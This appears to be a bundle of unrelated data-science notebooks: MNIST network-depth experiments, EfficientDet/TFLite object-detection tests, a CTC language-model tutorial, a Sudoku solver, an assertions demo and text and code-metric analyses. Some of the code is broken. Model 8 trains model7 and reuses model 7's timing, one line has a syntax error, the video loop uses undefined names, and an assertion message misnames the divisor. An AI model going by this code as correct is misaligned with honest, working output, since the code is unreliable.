table["model 6"]["processing_time"] = tm6
table["model 6"]["testset_acc"] = model6.evaluate(tf_X_test, tf_y_test)[1]
table["model 6"]["trainset_acc"] = model6.evaluate(tf_X_train, tf_y_train)[1]
# <div style="text-align: right"><b>model 7 : 30x4. 30 layers w 4 neurons each</b></div>
print("approximate start time : ", time.asctime())
start7 = time.perf_counter()
#classification MLP with two hidden layers
model7 = Sequential()
model7.add(Flatten(input_shape=[28, 28]))
model7.add(Dense(4, activation=tf_act_fun))
model7.add(Dense(4, activation=tf_act_fun))
model7.add(Dense(4, activation=tf_act_fun))
model7.add(Dense(4, activation=tf_act_fun))
model7.add(Dense(4, activation=tf_act_fun))
model7.add(Dense(4, activation=tf_act_fun))
model7.add(Dense(4, activation=tf_act_fun))
model7.add(Dense(4, activation=tf_act_fun))
model7.add(Dense(4, activation=tf_act_fun))
model7.add(Dense(4, activation=tf_act_fun))
model7.add(Dense(4, activation=tf_act_fun))
model7.add(Dense(4, activation=tf_act_fun))
model7.add(Dense(4, activation=tf_act_fun))
model7.add(Dense(4, activation=tf_act_fun))
model7.add(Dense(4, activation=tf_act_fun))
model7.add(Dense(4, activation=tf_act_fun))
model7.add(Dense(4, activation=tf_act_fun))
model7.add(Dense(4, activation=tf_act_fun))
model7.add(Dense(4, activation=tf_act_fun))
model7.add(Dense(4, activation=tf_act_fun))
model7.add(Dense(4, activation=tf_act_fun))
model7.add(Dense(4, activation=tf_act_fun))
model7.add(Dense(4, activation=tf_act_fun))
model7.add(Dense(4, activation=tf_act_fun))
model7.add(Dense(4, activation=tf_act_fun))
model7.add(Dense(4, activation=tf_act_fun))
model7.add(Dense(4, activation=tf_act_fun))
model7.add(Dense(4, activation=tf_act_fun))
model7.add(Dense(4, activation=tf_act_fun))
model7.add(Dense(10, activation="softmax"))
model7.summary()
model7.compile(loss="sparse_categorical_crossentropy",
optimizer="sgd",
metrics=["accuracy"])
history7 = model7.fit(tf_X_train, tf_y_train, epochs=30,
validation_data=(tf_X_valid, tf_y_valid))
stop7 = time.perf_counter()
tm7 = round(stop7 - start7)
print("approximate completion time : ", time.asctime())
print("time of execution in seconds : ", tm7)
print("time of execution in minutes : ", round(tm7/60, 1))
table["model 7"]["nbr_layers"] = "30"
table["model 7"]["nodes_p_layer"] = "4"
table["model 7"]["processing_time"] = tm7
table["model 7"]["testset_acc"] = model7.evaluate(tf_X_test, tf_y_test)[1]
table["model 7"]["trainset_acc"] = model7.evaluate(tf_X_train, tf_y_train)[1]
# <div style="text-align: right"><b>model 8 : 4x30. 4 layers w 30 neurons each</b></div>
print("approximate start time : ", time.asctime())
start8 = time.perf_counter()
#classification MLP with two hidden layers
model8 = Sequential()
model8.add(Flatten(input_shape=[28, 28]))
model8.add(Dense(30, activation=tf_act_fun))
model8.add(Dense(30, activation=tf_act_fun))
model8.add(Dense(30, activation=tf_act_fun))
model8.add(Dense(30, activation=tf_act_fun))
model8.add(Dense(10, activation="softmax"))
model8.summary()
model8.compile(loss="sparse_categorical_crossentropy",
optimizer="sgd",
metrics=["accuracy"])
history8 = model7.fit(tf_X_train, tf_y_train, epochs=12,
validation_data=(tf_X_valid, tf_y_valid))
stop8 = time.perf_counter()
tm8 = round(stop8 - start8)
print("approximate completion time : ", time.asctime())
print("time of execution in seconds : ", tm8)
print("time of execution in minutes : ", round(tm8/60, 1))
table["model 8"]["nbr_layers"] = "4"
table["model 8"]["nodes_p_layer"] = "30"
table["model 8"]["processing_time"] = tm7
table["model 8"]["testset_acc"] = model8.evaluate(tf_X_test, tf_y_test)[1]
table["model 8"]["trainset_acc"] = model8.evaluate(tf_X_train, tf_y_train)[1]
print("processing time in seconds : ")
pd.DataFrame(table).transpose()
|
Fall2020/MSDS422/mnist_data/asn6_tanh.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3 (ipykernel)
# language: python
# name: python3
# ---
# +
import tensorflow as tf
tf.config.list_physical_devices('GPU')
# +
import tensorflow as tf
import cv2
import numpy as np
from PIL import Image
import os
import time
from configuration import Config
from core.efficientdet import EfficientDet, PostProcessing
from data.dataloader import DataLoader
# +
# 원래 모델
def idx2class():
return dict((v, k) for k, v in Config.pascal_voc_classes.items())
def draw_boxes_on_image(image, boxes, scores, classes):
num_boxes = boxes.shape[0]
for i in range(num_boxes):
class_and_score = str(idx2class()[classes[i]]) + ": " + str(scores[i])
cv2.rectangle(img=image, pt1=(boxes[i, 0], boxes[i, 1]), pt2=(boxes[i, 2], boxes[i, 3]), color=(255, 0, 0), thickness=2)
cv2.putText(img=image, text=class_and_score, org=(boxes[i, 0], boxes[i, 1] - 10), fontFace=cv2.FONT_HERSHEY_COMPLEX, fontScale=1.5, color=(0, 255, 255), thickness=2)
return image
def test_single_picture(picture_dir, model):
image_array = cv2.imread(picture_dir)
print(image_array.shape)
image = DataLoader.image_preprocess(is_training=False, image_dir=picture_dir)
image = tf.expand_dims(input=image, axis=0)
outputs = model(image, training=True)
post_process = PostProcessing()
boxes, scores, classes = post_process.testing_procedure(outputs, [image_array.shape[0], image_array.shape[1]])
# print("-"*50)
# print("boxes")
# print(boxes)
print("-" * 50)
print("scores")
print(scores)
# print("-" * 50)
# print("classes")
# print(classes)
# print("-" * 50)
image_with_boxes = draw_boxes_on_image(image_array, boxes.astype(np.int), scores, classes)
return image_with_boxes
# def test_batch_picture(image_list, model):
# outputs = model(image_list_batch, training=True)
# post_process = PostProcessing()
# boxes = []
# scores = []
# classes = []
# for i in range(32):
# image_array = image_list[i]
# image = tf.expand_dims(input=image_array, axis=0)
# print(outputs[i].shape)
# print(image_list[i].shape)
# print( [ image_array.shape[0], image_array.shape[1]])
# boxes[i], scores[i], classes[i] = post_process.testing_procedure(outputs[i], [ image_array.shape[0], image_array.shape[1]])
# print("boxes : ", boxes.shape)
# print("scores : ", scores.shape)
# print("classes : ", classes.shape)
# image_with_boxes = draw_boxes_on_image(image_array, boxes.astype(np.int), scores, classes)
# return image_with_boxes
# def data_load(image_path):
# path = image_path
# count = 0
# image_list = []
# for item in os.listdir(path)[:32]:
# imgpath = path +'/' + item
# img = Image.open(imgpath)
# arr = np.array(img)
# image_list.append(arr)
# #img.save(str(count) + "output.png")
# count = count +1
# image_batch = tf.image.resize(image_list, (512,512))
# # image_temp = tf.data.Dataset.from_tensor_slices(image_list).batch(32).take(1)
# # image_batch = tf.image.resize(image_temp, (512,512))
# return image_batch
# +
if __name__ == '__main__':
# GPU settings
gpus = tf.config.list_physical_devices("GPU")
if gpus:
for gpu in gpus:
tf.config.experimental.set_memory_growth(gpu, True)
#load_weights_from_epoch = Config.load_weights_from_epoch_quan
efficientdet = EfficientDet()
#efficientdet.load_weights(filepath=Config.save_model_dir + "saved_model")
load_weights_from_epoch = 100
efficientdet.load_weights(filepath=Config.best_model_dir+"epoch-{}".format(load_weights_from_epoch))
#efficientdet.load_weights(filepath=Config.best_model_dir+"epoch-{}_cus".format(load_weights_from_epoch))
#efficientdet.load_weights(filepath=Config.save_model_dir+"epoch-{}".format(load_weights_from_epoch))
#efficientdet.load_weights(filepath=Config.save_model_dir+"epoch-{}".format(load_weights_from_epoch))
# image_path = './data/fire_smoke/train/JPEGImages'
# image_list_batch = data_load(image_path)
# t1 = time.time()
# outputs = efficientdet(image_list_batch, training=True)
# t2 = time.time()
# print("------------------------------------")
# print(t2-t1)
# print(outputs.shape)
# image_output_list = test_batch_picture(image_list_batch, efficientdet)
# print(image_output_list.shape)
test_image_dir_1 = "./test_pictures/KakaoTalk_20211103_192433256.png"
# test_image_dir_2 = "./test_pictures/ck0kewsaha6hh07215jgx1bp2_jpeg.rf.1a375d20560d0de016bb524921f7b2a9.jpg"
# test_image_dir_3 = "./test_pictures/ck0kfhu4n8q7f0701ixmonyig_jpeg.rf.a3cc5282520b3bac90718bdd5528bd76.jpg"
# test_image_dir_4 = "./test_pictures/smoking_women.jpg"
image = test_single_picture(picture_dir=test_image_dir_1, model=efficientdet)
cv2.namedWindow("detect result", flags=cv2.WINDOW_NORMAL)
cv2.imshow("detect result", image)
cv2.waitKey(0)
# image = test_single_picture(picture_dir=test_image_dir_2, model=efficientdet)
# cv2.namedWindow("detect result", flags=cv2.WINDOW_NORMAL)
# cv2.imshow("detect result", image)
# cv2.waitKey(0)
# image = test_single_picture(picture_dir=test_image_dir_3, model=efficientdet)
# cv2.namedWindow("detect result", flags=cv2.WINDOW_NORMAL)
# cv2.imshow("detect result", image)
# cv2.waitKey(0)
# image = test_single_picture(picture_dir=test_image_dir_4, model=efficientdet)
# print(image.shape)
# cv2.namedWindow("detect result", flags=cv2.WINDOW_NORMAL)
# cv2.imshow("detect result", image)
# cv2.waitKey(0)
# -
cv2.imshow("detect result", image)
cv2.waitKey(0)
# +
# tflite 평가 하기
def idx2class():
return dict((v, k) for k, v in Config.pascal_voc_classes.items())
def draw_boxes_on_image(image, boxes, scores, classes):
num_boxes = boxes.shape[0]
for i in range(num_boxes):
class_and_score = str(idx2class()[classes[i]]) + ": " + str(scores[i])
cv2.rectangle(img=image, pt1=(boxes[i, 0], boxes[i, 1]), pt2=(boxes[i, 2], boxes[i, 3]), color=(255, 0, 0), thickness=2)
cv2.putText(img=image, text=class_and_score, org=(boxes[i, 0], boxes[i, 1] - 10), fontFace=cv2.FONT_HERSHEY_COMPLEX, fontScale=1.5, color=(0, 255, 255), thickness=2)
return image
def load_model(path):
interpreter = tf.lite.Interpreter(model_path = path)
interpreter.resize_tensor_input(0, [ 1 , 640, 640, 3])
# interpreter.resize_tensor_input(856, [ 1, 49104, 5])
interpreter.allocate_tensors()
return interpreter
def test_single_picture(picture_dir, model):
image_array = cv2.imread(picture_dir)
image = DataLoader.image_preprocess(is_training=False, image_dir=picture_dir)
image = tf.expand_dims(input=image, axis=0)
print(image.shape)
input_data = np.array(image, dtype = np.uint8)
input_details = model.get_input_details()[0]
output_details = model.get_output_details()[0]
model.set_tensor(input_details['index'], input_data)
model.invoke()
outputs= model.get_tensor(output_details['index'])
print(outputs)
# 원래 outputs = 소수점 형태
# quantizaation model = 숫자 너무큼.. output_tensor shape 해결하기
outputs = tf.constant(outputs)
post_process = PostProcessing()
boxes, scores, classes = post_process.testing_procedure(outputs, [image_array.shape[0], image_array.shape[1]])
print("-"*50)
print("boxes")
print(boxes)
print("-" * 50)
print("scores")
print(scores)
print("-" * 50)
print("classes")
print(classes)
print("-" * 50)
image_with_boxes = draw_boxes_on_image(image_array, boxes.astype(np.int), scores, classes)
return image_with_boxes
# -
def writeVideo():
video_capture = cv2.VideoCapture('rtsp://----------')
video_capture.set(3, 800) # 영상 가로길이 설정
video_capture.set(4, 600) # 영상 세로길이 설정
fps = 20
# 가로 길이 가져오기
streaming_window_width = int(video_capture.get(3))
# 세로 길이 가져오기
streaming_window_height = int(video_capture.get(4))
#파일 저장하기 위한 변수 선언
path = f'D:/cctv/cctv/python/{fileName}.avi'
fourcc = cv2.VideoWriter_fourcc('X', 'V', 'I', 'D')
# +
gpus = tf.config.list_physical_devices("GPU")
if gpus:
for gpu in gpus:
tf.config.experimental.set_memory_growth(gpu, True
model_path = "./tflite_model_quant_D1_SGD.tflite"
efficientdet_lite = load_model(model_path)
cap = cv2.VideoCapture(args.camera_idx)
while cap.isOpened():
ret, frame = cap.read()
if not ret:
break
cv2_im = frame
cv2_im_rgb = cv2.cvtColor(cv2_im, cv2.COLOR_BGR2RGB)
cv2_im_rgb = cv2.resize(cv2_im_rgb, inference_size)
cv2_im = test_single_picture(interpreter, cv2_im_rgb.tobytes())
cv2.imshow('frame', cv2_im)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
cap.release()
cv2.destroyAllWindows()
# +
gpus = tf.config.list_physical_devices("GPU")
if gpus:
for gpu in gpus:
tf.config.experimental.set_memory_growth(gpu, True)
model_path = "./tflite_model_quant_D1_SGD.tflite"
efficientdet_lite = load_model(model_path)
test_image_dir_1 = "./test_pictures/ck0kepbs9kdym0848hgpcf3y9_jpeg.rf.d0a63becb54a83b6b026f4b38a42933b.jpg"
test_image_dir_2 = "./test_pictures/ck0kewsaha6hh07215jgx1bp2_jpeg.rf.1a375d20560d0de016bb524921f7b2a9.jpg"
test_image_dir_3 = "./test_pictures/ck0kfhu4n8q7f0701ixmonyig_jpeg.rf.a3cc5282520b3bac90718bdd5528bd76.jpg"
test_image_dir_4 = "./test_pictures/smoking_women.jpg"
image = test_single_picture(picture_dir=test_image_dir_1, model=efficientdet_lite)
cv2.namedWindow("detect result", flags=cv2.WINDOW_NORMAL)
cv2.imshow("detect result", image)
cv2.waitKey(0)
image = test_single_picture(picture_dir=test_image_dir_2, model=efficientdet_lite)
cv2.namedWindow("detect result", flags=cv2.WINDOW_NORMAL)
cv2.imshow("detect result", image)
cv2.waitKey(0)
image = test_single_picture(picture_dir=test_image_dir_3, model=efficientdet_lite)
cv2.namedWindow("detect result", flags=cv2.WINDOW_NORMAL)
cv2.imshow("detect result", image)
cv2.waitKey(0)
image = test_single_picture(picture_dir=test_image_dir_4, model=efficientdet_lite)
cv2.namedWindow("detect result", flags=cv2.WINDOW_NORMAL)
cv2.imshow("detect result", image)
cv2.waitKey(0)
# -
# !nvidia-smi
|
test_custom.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # CTC Language Model
# <div class="alert alert-info">
#
# This tutorial is available as an IPython notebook at [malaya-speech/example/ctc-language-model](https://github.com/huseinzol05/malaya-speech/tree/master/example/ctc-language-model).
#
# </div>
# <div class="alert alert-warning">
#
# This module is not language independent, so it not save to use on different languages. Pretrained models trained on hyperlocal languages.
#
# </div>
# ### Purpose
# When doing CTC greedy / beam decoding, we want to add language bias during find the optimum alignment.
# ### Install
#
# #### From PYPI
#
# ```bash
# pip3 install ctc-decoders
# ```
#
# But if you use linux, we unable to upload linux wheels to pypi repository, so download linux wheel at [malaya-speech/ctc-decoders](https://github.com/huseinzol05/malaya-speech/tree/master/ctc-decoders#available-whl).
# #### From source
#
# Check [malaya-speech/ctc-decoders](https://github.com/huseinzol05/malaya-speech/tree/master/ctc-decoders#from-source) how to build from source incase there is no available wheel for your operating system.
#
# Building from source should took a few minutes.
# ### Test CTC Decoders
from ctc_decoders import ctc_greedy_decoder, ctc_beam_search_decoder
import numpy as np
import malaya_speech
# +
# https://github.com/PaddlePaddle/DeepSpeech/blob/master/decoders/tests/test_decoders.py
vocab_list = ["\'", ' ', 'a', 'b', 'c', 'd']
beam_size = 20
probs_seq1 = [[
0.06390443, 0.21124858, 0.27323887, 0.06870235, 0.0361254,
0.18184413, 0.16493624
], [
0.03309247, 0.22866108, 0.24390638, 0.09699597, 0.31895462,
0.0094893, 0.06890021
], [
0.218104, 0.19992557, 0.18245131, 0.08503348, 0.14903535,
0.08424043, 0.08120984
], [
0.12094152, 0.19162472, 0.01473646, 0.28045061, 0.24246305,
0.05206269, 0.09772094
], [
0.1333387, 0.00550838, 0.00301669, 0.21745861, 0.20803985,
0.41317442, 0.01946335
], [
0.16468227, 0.1980699, 0.1906545, 0.18963251, 0.19860937,
0.04377724, 0.01457421
]]
probs_seq2 = [[
0.08034842, 0.22671944, 0.05799633, 0.36814645, 0.11307441,
0.04468023, 0.10903471
], [
0.09742457, 0.12959763, 0.09435383, 0.21889204, 0.15113123,
0.10219457, 0.20640612
], [
0.45033529, 0.09091417, 0.15333208, 0.07939558, 0.08649316,
0.12298585, 0.01654384
], [
0.02512238, 0.22079203, 0.19664364, 0.11906379, 0.07816055,
0.22538587, 0.13483174
], [
0.17928453, 0.06065261, 0.41153005, 0.1172041, 0.11880313,
0.07113197, 0.04139363
], [
0.15882358, 0.1235788, 0.23376776, 0.20510435, 0.00279306,
0.05294827, 0.22298418
]]
greedy_result = ["ac'bdc", "b'da"]
beam_search_result = ['acdc', "b'a"]
# -
ctc_greedy_decoder(np.array(probs_seq1), vocab_list) == greedy_result[0]
ctc_greedy_decoder(np.array(probs_seq2), vocab_list) == greedy_result[1]
ctc_beam_search_decoder(probs_seq = np.array(probs_seq1),
beam_size = beam_size,
vocabulary = vocab_list)
ctc_beam_search_decoder(probs_seq = np.array(probs_seq2),
beam_size = beam_size,
vocabulary = vocab_list)
# ### List available Language Model
#
# We provided language model for our ASR CTC models,
malaya_speech.stt.available_language_model()
# ### Load Language Model
#
# ```python
# def language_model(
# model: str = 'malaya-speech',
# alpha: float = 2.5,
# beta: float = 0.3,
# **kwargs
# ):
# """
# Load KenLM language model.
#
# Parameters
# ----------
# model : str, optional (default='malaya-speech')
# Model architecture supported. Allowed values:
#
# * ``'malaya-speech'`` - Gathered from malaya-speech ASR transcript.
# * ``'local'`` - Gathered from IIUM Confession.
#
# alpha: float, optional (default=2.5)
# score = alpha * np.log(lm) + beta * np.log(word_cnt),
# increase will put more bias on lm score computed by kenlm.
# beta: float, optional (beta=0.3)
# score = alpha * np.log(lm) + beta * np.log(word_cnt),
# increase will put more bias on word count.
#
# Returns
# -------
# result : Tuple[ctc_decoders.Scorer, List[str]]
# Tuple of ctc_decoders.Scorer and vocab.
# """
# ```
lm = malaya_speech.stt.language_model()
# ### Build custom Language Model
#
# 1. Build KenLM,
#
# ```bash
# wget -O - https://kheafield.com/code/kenlm.tar.gz |tar xz
# # mkdir kenlm/build
# # cd kenlm/build
# cmake ..
# make -j2
# ```
# 2. Prepare newlines text file. Feel free to use some from https://github.com/huseinzol05/Malay-Dataset/tree/master/dumping.
#
# ```bash
# kenlm/build/bin/lmplz --text text.txt --arpa out.arpa -o 3 --prune 0 1 1
# kenlm/build/bin/build_binary -q 8 -b 7 -a 256 trie out.arpa out.trie.klm
# ```
#
# 3. Once you have `out.trie.klm`, you can load to scorer interface.
#
# ```python
# from ctc_decoders import Scorer
#
# scorer = Scorer(alpha, beta, 'out.trie.klm', vocab_list)
# ```
|
example/ctc-language-model/ctc-language-model.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## Algoritmo para resolver un Sudoku
# https://github.com/jorditorresBCN/Sudoku/blob/master/README.md
rows = 'ABCDEFGHI'
cols = '123456789'
def cross(A, B):
"Cross product of elements in A and elements in B."
return [a+b for a in A for b in B]
boxes = cross(rows, cols)
row_units = [cross(r, cols) for r in rows]
column_units = [cross(rows, c) for c in cols]
square_units = [cross(rs, cs) for rs in ('ABC','DEF','GHI') for cs in ('123','456','789')]
unitlist = row_units + column_units + square_units
units = dict((s, [u for u in unitlist if s in u]) for s in boxes)
peers = dict((s, set(sum(units[s],[]))-set([s])) for s in boxes)
def display(values):
width = 1+max(len(values[s]) for s in boxes)
line = '+'.join(['-'*(width*3)]*3)
for r in rows:
print(''.join(values[r+c].center(width)+('|' if c in '36' else '')
for c in cols))
if r in 'CF': print(line)
return
def grid_values_original(grid):
return dict(zip(boxes, grid))
def grid_values(grid):
values = []
for c in grid:
if c == '.':
values.append('123456789')
elif c in '123456789':
values.append(c)
return dict(zip(boxes, values))
example='483.2.6..9..3.5..1..18.64....81.29..7.......8..67.82....26.95..8..2.3..9..5.1.382'
display(grid_values_original(example))
display(grid_values(example))
def eliminate(values):
"""Eliminate values from peers of each box with a single value.
"""
solved_values = [box for box in values.keys() if len(values[box]) == 1]
for box in solved_values:
digit = values[box]
for peer in peers[box]:
values[peer] = values[peer].replace(digit,'')
return values
example='483.2.6..9..3.5..1..18.64....81.29..7.......8..67.82....26.95..8..2.3..9..5.1.382'
display(grid_values(example))
example_after_eliminate=eliminate(grid_values(example))
display(example_after_eliminate)
def only_choice(values):
for unit in unitlist:
for digit in '123456789':
dplaces = [box for box in unit if digit in values[box]]
if len(dplaces) == 1:
values[dplaces[0]] = digit
return values
display(example_after_eliminate)
example_after_only_choice=only_choice(example_after_eliminate)
print (" "), print (" "), print (" ")
display(example_after_only_choice)
def reduce_sudoku(values):
stalled = False
while not stalled:
# Check how many boxes have a determined value
solved_values_before = len([box for box in values.keys() if len(values[box]) == 1])
# se the Eliminate Strategy
values = eliminate(values)
# Use the Only Choice Strategy
values = only_choice(values)
# Check how many boxes have a determined value, to compare
solved_values_after = len([box for box in values.keys() if len(values[box]) == 1])
# If no new values were added, stop the loop.
stalled = solved_values_before == solved_values_after
# Sanity check, return False if there is a box with zero available values:
if len([box for box in values.keys() if len(values[box]) == 0]):
return False
return values
example='..3.2.6..9..3.5..1..18.64....81.29..7.......8..67.82....26.95..8..2.3..9..5.1.3..'
display(grid_values_original(example))
print (" "), print (" "), print (" ")
display(reduce_sudoku(grid_values(example)))
example='2.............62....1....7......8...3...9...7...6..4...4....8....52.............3'
display(grid_values_original(example))
display(reduce_sudoku(grid_values(example)))
def search(values):
values = reduce_sudoku(values)
if values is False:
return False ## Failed earlier
if all(len(values[s]) == 1 for s in boxes):
return values ## Solved!
# Choose one of the unfilled squares with the fewest possibilities
unfilled_squares= [(len(values[s]), s) for s in boxes if len(values[s]) > 1]
n,s = min(unfilled_squares)
# recurrence to solve each one of the resulting sudokus
for value in values[s]:
nova_sudoku = values.copy()
nova_sudoku[s] = value
attempt = search(nova_sudoku)
if attempt:
return attempt
def solve(grid):
# Create a dictionary of values from the grid
values = grid_values(grid)
return search(values)
example='2.............62....1....7......8...3...9...7...6..4...4....8....52.............3'
display(grid_values_original(example))
display(solve(example))
# +
#for creating a .py program
if __name__ == '__main__':
sudoku_grid = '2.............62....1....7...6..8...3...9...7...6..4...4....8....52.............3'
print ("original:")
display(grid_values_original(sudoku_grid))
print (" ")
print ("solución:")
display(solve(sudoku_grid))
|
Sudoku.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Assertions
# [Assertions](https://www.tutorialspoint.com/python/assertions_in_python.htm) help to debug and test your code. See exceptions.
# +
def divide(a, b):
assert(b!=0), 'The numerator is 0!'
return a//b
divide(1, 0)
# -
try:
divide(1, 0)
except Exception as e:
print(e)
# Assertions are ignored when the interpreter runs in release (optimized) mode:
# !python -c "assert(False); print('In debug mode this is not printed')"
# !python -O -c "assert(False); print('You are running in optimized mode')"
|
15-assertions.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Exploratory Data Analysis
# So until now, we have not idea whether all our efforts are gonna be invain or not; But by doing the analysis here, we will know with high confidence whether the data is useful or not.
#
# We do this by analysing the followings:
# 1. **Most common words** - find these and create word clouds
# 2. **Size of vocabulary** - look number of unique words and also how quickly someone speaks
# 3. **Amount of profanity** - most common terms
# ## Load the cleaned data
# +
import pandas as pd
data = pd.read_csv('saves/2.cleaned_transcripts_df.csv', index_col = 0)
data
# -
# ## Vectorize the data
# +
# Imports
from sklearn.feature_extraction.text import CountVectorizer
import pandas as pd
# Vectorize
vectorizer = CountVectorizer(stop_words = 'english')
vectorized_data = vectorizer.fit_transform(data['Transcript'])
# Convert to DataFrame
vectorized_df = pd.DataFrame(vectorized_data.toarray(), columns = vectorizer.get_feature_names())
vectorized_df.index = data.index
vectorized_df
# -
# ## Save vectorized data & the vectorizer obj
# +
import pickle
vectorized_df.to_csv('saves/3.vectorized_transcripts_df.csv')
pickle.dump(vectorizer, open("saves/3.vectorizer.pkl", "wb"))
# -
# ## Analysis
# ### Most Common Words
vectorized_df = vectorized_df.transpose()
# +
top_words = {}
for column in vectorized_df.columns:
tokens = vectorized_df[column]
tokens = tokens.sort_values(ascending = False).head(30)
top_words[column] = tokens
print(column + ':\n -', ', '.join(list(tokens.index[:15])))
# -
# #### Remove the most commen words
#
# Common words seem meaningless in our analysis since everyone uses them. So they won't provide much information.
# +
top_all_words = []
for column in vectorized_df.columns:
words = list(top_words[column].index)
for word in words: top_all_words.append(word)
# +
# Imports
from collections import Counter
# Find words that are common between atleast 6 of the comedians
add_stop_words = [word for word, count in Counter(top_all_words).most_common() if count > 6]
add_stop_words
# -
# #### Load the cleaned data
clean_df = pd.read_csv('saves/2.cleaned_transcripts_df.csv', index_col = 0)
clean_df
# #### Re-vectorize the clean data
# +
# Imports
from sklearn.feature_extraction import text
from sklearn.feature_extraction.text import CountVectorizer
# Update the stop words list
stop_words = text.ENGLISH_STOP_WORDS.union(add_stop_words)
vectorizer = CountVectorizer(stop_words = stop_words)
data_cv = vectorizer.fit_transform(clean_df['Transcript'])
new_vectorized_df = pd.DataFrame(data_cv.toarray(), columns = vectorizer.get_feature_names())
new_vectorized_df.index = clean_df.index
# -
# #### Save the new vectorized data
new_vectorized_df.to_csv('saves/3.stopwords_vectorized_df.csv')
pickle.dump(vectorizer, open("saves/3.vectorizer.pkl", "wb"))
# #### Wordclouds
# +
# Imports
from wordcloud import WordCloud
wc = WordCloud(
stopwords = stop_words,
background_color = "white",
colormap = "Dark2",
max_font_size = 150,
random_state = 42
)
# +
# Imports
import matplotlib.pyplot as plt
plt.rcParams['figure.figsize'] = [16, 6]
# Create subplots for each comedian
for index, comedian in enumerate(clean_df.index):
wc.generate(clean_df['Transcript'][index])
plt.subplot(3, 4, index + 1)
plt.imshow(wc, interpolation = "bilinear")
plt.axis("off")
plt.title(comedian)
plt.show()
# -
# ### Size of vocabulary
# I decided not to do this section as it's not dynamic and required manual data to be fed to complete the analysis.
# ### Amount of profanity
Counter(top_all_words).most_common()
# +
# Most common profanities used
profanities = ['fuck', 'shit']
profanities_df = vectorized_df.transpose()[profanities]
profanities_df
# +
for i, comedian in enumerate(profanities_df.index):
x = profanities_df['shit'].loc[comedian]
y = profanities_df['fuck'].loc[comedian]
plt.scatter(x, y, c = 'b')
plt.text(x + 0.5, y + 0.5, comedian, fontsize = 10)
plt.title('F words / S words ratio')
plt.xlabel('S words')
plt.ylabel('F words')
plt.show()
|
3.Exploratory Data Analysis.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Getting started
pip install numpy pandas matplotlib seaborn
import numpy as np
import pandas as pd
import seaborn as sb
import matplotlib.pyplot as mplot
# Load Quaatlas matrix and create dataframe
quaatlas = pd.read_csv('./../data/quaatlas/matrix.csv')
# Let's check first rows of the dataframe
quaatlas.head()
# # Visualizations
# ## Size
# +
# Set size of the figure
mplot.figure(figsize=(9,5), dpi=100)
# Set title and labels
mplot.title('LOCs per Project')
mplot.xlabel('LOCs')
mplot.ylabel('Number of projects')
# Create histogram
mplot.hist(quaatlas['locs'], rwidth=0.9, bins=77)
mplot.show()
# +
# Set figure with subplots
fig, axs = mplot.subplots(ncols=3)
fig.set_size_inches(18, 5, forward=True)
fig.suptitle('LOCs Distributions', fontsize=20)
# Draw distributions
sb.distplot(quaatlas['locs'], bins=60, kde=False, rug=True, ax=axs[0])
sb.distplot(quaatlas['clocs'], bins=60, kde=False, rug=True, ax=axs[1])
sb.distplot(quaatlas['elocs'], bins=60, kde=False, rug=True, ax=axs[2])
# Set labels
axs[0].set_ylabel('# Projects')
axs[0].set_xlabel('LOCs')
axs[1].set_ylabel('# Projects')
axs[1].set_xlabel('CLOCs')
axs[2].set_ylabel('# Projects')
axs[2].set_xlabel('ELOCs')
# +
# Set figure with subplots
fig, ax = mplot.subplots()
fig.set_size_inches(10, 6, forward=True)
fig.suptitle('LOCs Boxplots', fontsize=20)
# Draw boxplots
ax = quaatlas.boxplot(column=['locs', 'clocs', 'elocs'])
mplot.xlabel("LOC types")
mplot.ylabel("Frequency")
# -
# ## Declarations
# +
# Set size of the figure
mplot.figure(figsize=(9,5), dpi=100)
# Set title and labels
mplot.title('Declarations per Project')
mplot.xlabel('Number of declarations')
mplot.ylabel('Number of projects')
# Create histogram
mplot.hist(quaatlas['declarations'], rwidth=0.9, bins=77)
mplot.show()
# +
# Set figure with subplots
fig, axs = mplot.subplots(ncols=2, nrows=2)
fig.set_size_inches(15, 10, forward=True)
fig.suptitle('Declaration Distributions', fontsize=20)
# Draw distributions
sb.distplot(quaatlas['declarations'], bins=60, kde=False, rug=True, ax=axs[0][0])
sb.distplot(quaatlas['types'], bins=60, kde=False, rug=True, ax=axs[0][1])
sb.distplot(quaatlas['methods'], bins=60, kde=False, rug=True, ax=axs[1][0])
sb.distplot(quaatlas['fields'], bins=60, kde=False, rug=True, ax=axs[1][1])
# Set labels
axs[0][0].set_ylabel('# Projects')
axs[0][0].set_xlabel('# All declarations')
axs[0][1].set_ylabel('# Projects')
axs[0][1].set_xlabel('# Types')
axs[1][0].set_ylabel('# Projects')
axs[1][0].set_xlabel('# Methods')
axs[1][1].set_ylabel('# Projects')
axs[1][1].set_xlabel('# Fields')
# +
# Set figure with subplots
fig, ax = mplot.subplots()
fig.set_size_inches(10, 6, forward=True)
fig.suptitle('Declaration Boxplots', fontsize=20)
# Draw boxplots
ax = quaatlas.boxplot(column=['declarations', 'types', 'methods', 'fields'])
mplot.xlabel("Declaration types")
mplot.ylabel("Frequency")
# -
|
stract/stract/stract_nb.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Purpose
#
